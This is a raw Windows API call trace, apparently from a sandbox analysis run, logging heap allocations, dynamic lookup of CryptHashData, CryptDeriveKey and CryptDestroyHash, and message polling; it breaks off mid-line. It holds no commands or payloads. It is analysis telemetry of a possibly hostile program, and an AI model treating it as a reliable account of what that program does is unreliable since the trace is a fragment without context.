RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69be8 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0238.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0238.850] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0238.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0238.851] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.851] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.851] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.852] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.852] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51418 [0238.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51418, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.853] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0238.853] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.853] CryptHashData (hHash=0xa86f50, pbData=0x2e55048, dwDataLen=0x3, dwFlags=0x1) returned 1 [0238.853] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0238.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0238.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0238.854] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0238.854] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.854] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0238.854] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.854] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.854] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f800 | out: hHeap=0x970000) returned 1 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0238.855] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0238.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0238.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51340, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0238.855] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0238.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0238.855] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.855] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0238.856] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f50, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87290) returned 1 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.856] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0238.856] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0238.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0238.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0238.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0238.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0238.857] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0238.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0238.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.857] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.857] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0238.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0238.858] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0238.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0238.858] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0238.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0238.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0238.858] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69b48 [0238.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69b48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0238.859] CryptDestroyHash (hHash=0xa86f50) returned 1 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0238.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0238.859] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 